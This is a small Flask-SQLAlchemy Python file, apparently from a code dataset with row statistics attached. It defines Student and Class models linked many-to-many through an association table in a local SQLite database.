# c.students.append(s)
# db.session.add(c)
# db.session.commit() | 30.162162 | 73 | 0.710573 | from datetime import datetime
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///relation_hello_v22.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
student_identifier = db.Table('student_identifier',
db.Column('class_id', db.Integer, db.ForeignKey('classes.class_id')),
db.Column('user_id', db.Integer, db.ForeignKey('students.user_id'))
)
class Student(db.Model):
__tablename__ = 'students'
user_id = db.Column(db.Integer, primary_key=True)
user_fistName = db.Column(db.String(64))
user_lastName = db.Column(db.String(64))
user_email = db.Column(db.String(128), unique=True)
class Class(db.Model):
__tablename__ = 'classes'
class_id = db.Column(db.Integer, primary_key=True)
class_name = db.Column(db.String(128), unique=True)
students = db.relationship("Student",
secondary=student_identifier)
# s = Student()
# c = Class()
# c.students.append(s)
# db.session.add(c)
# db.session.commit() | 0 | 479 | 46 |